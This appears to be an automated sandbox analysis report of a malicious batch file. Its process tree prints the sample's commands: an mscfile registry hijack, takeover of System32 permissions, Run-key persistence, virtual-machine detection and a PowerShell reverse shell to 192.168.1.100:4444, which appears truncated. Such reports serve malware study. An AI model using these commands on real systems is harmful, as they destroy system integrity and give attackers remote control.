396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

Analysis

max time kernel
139s
max time network
142s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
08/09/2024, 06:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom.bat
Size

4KB
MD5

1c63745d54962d205bb3ae879bea1ed4
SHA1

a832c894a4e2b6d486c48b9ea6ec79d94df9537e
SHA256

396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
SHA512

129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
SSDEEP

96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Score

8^/10

discovery execution exploit persistence

Malware Config

Signatures

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
3100	takeown.exe
4520	takeown.exe
1196	icacls.exe
3596	icacls.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1196	icacls.exe
3596	icacls.exe
3100	takeown.exe
4520	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4840	powershell.exe
2304	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
728	timeout.exe
2860	timeout.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
920	systeminfo.exe
4796	systeminfo.exe
2912	systeminfo.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings	cmd.exe
Key deleted	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell	reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4840	powershell.exe
4840	powershell.exe
2304	powershell.exe
2304	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeTakeOwnershipPrivilege	3100	takeown.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeTakeOwnershipPrivilege	4520	takeown.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 1876 wrote to memory of 3236	1876	cmd.exe	79
PID 1876 wrote to memory of 3236	1876	cmd.exe	79
PID 1876 wrote to memory of 4840	1876	cmd.exe	80
PID 1876 wrote to memory of 4840	1876	cmd.exe	80
PID 1876 wrote to memory of 728	1876	cmd.exe	81
PID 1876 wrote to memory of 728	1876	cmd.exe	81
PID 1876 wrote to memory of 2740	1876	cmd.exe	82
PID 1876 wrote to memory of 2740	1876	cmd.exe	82
PID 1876 wrote to memory of 624	1876	cmd.exe	83
PID 1876 wrote to memory of 624	1876	cmd.exe	83
PID 1876 wrote to memory of 2860	1876	cmd.exe	87
PID 1876 wrote to memory of 2860	1876	cmd.exe	87
PID 624 wrote to memory of 3100	624	cmd.exe	88
PID 624 wrote to memory of 3100	624	cmd.exe	88
PID 1876 wrote to memory of 3196	1876	cmd.exe	89
PID 1876 wrote to memory of 3196	1876	cmd.exe	89
PID 1876 wrote to memory of 4796	1876	cmd.exe	90
PID 1876 wrote to memory of 4796	1876	cmd.exe	90
PID 1876 wrote to memory of 2184	1876	cmd.exe	91
PID 1876 wrote to memory of 2184	1876	cmd.exe	91
PID 1876 wrote to memory of 2912	1876	cmd.exe	94
PID 1876 wrote to memory of 2912	1876	cmd.exe	94
PID 1876 wrote to memory of 1016	1876	cmd.exe	95
PID 1876 wrote to memory of 1016	1876	cmd.exe	95
PID 1876 wrote to memory of 920	1876	cmd.exe	96
PID 1876 wrote to memory of 920	1876	cmd.exe	96
PID 1876 wrote to memory of 1160	1876	cmd.exe	97
PID 1876 wrote to memory of 1160	1876	cmd.exe	97
PID 1876 wrote to memory of 2304	1876	cmd.exe	98
PID 1876 wrote to memory of 2304	1876	cmd.exe	98
PID 1876 wrote to memory of 4948	1876	cmd.exe	99
PID 1876 wrote to memory of 4948	1876	cmd.exe	99
PID 1876 wrote to memory of 4520	1876	cmd.exe	100
PID 1876 wrote to memory of 4520	1876	cmd.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1876
- C:\Windows\system32\mode.com
  mode con: cols=800 lines=60
  2⤵
  PID:3236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4840
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:728
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
  2⤵
  - Modifies registry class
  PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:624
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3100
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\* /grant Admin:F /t /c
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1196
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2860
- C:\Windows\system32\reg.exe
  reg delete "HKCU\Software\Classes\mscfile" /f
  2⤵
  - Modifies registry class
  PID:3196
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:4796
- C:\Windows\system32\findstr.exe
  findstr /i "VirtualBox"
  2⤵
  PID:2184
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:2912
- C:\Windows\system32\findstr.exe
  findstr /i "VMware"
  2⤵
  PID:1016
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:920
- C:\Windows\system32\findstr.exe
  findstr /i "Hyper-V"
  2⤵
  PID:1160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2304
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
  2⤵
  - Adds Run key to start application
  PID:4948
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\System32\* /r /d y
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4520
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\System32\* /grant Admin:F /t /c
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d405540758f0f5bdaab94f1a054cc67d

SHA1
07e307420a26d17c2dc1226af6e72018da4ae26c

SHA256
2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61

SHA512
59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l52g0prf.5gj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

Filesize
285B

MD5
4577f08330df24a350ff523ec87bf38e

SHA1
5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

SHA256
5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

SHA512
ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

Download Submit
memory/4840-0-0x00007FFDAEE53000-0x00007FFDAEE55000-memory.dmp

Filesize
8KB

Download
memory/4840-1-0x0000014D10B10000-0x0000014D10B32000-memory.dmp

Filesize
136KB

Download
memory/4840-10-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp

Filesize
10.8MB

Download
memory/4840-11-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp

Filesize
10.8MB

Download
memory/4840-12-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp

Filesize
10.8MB

Download
memory/4840-15-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp

Filesize
10.8MB

Download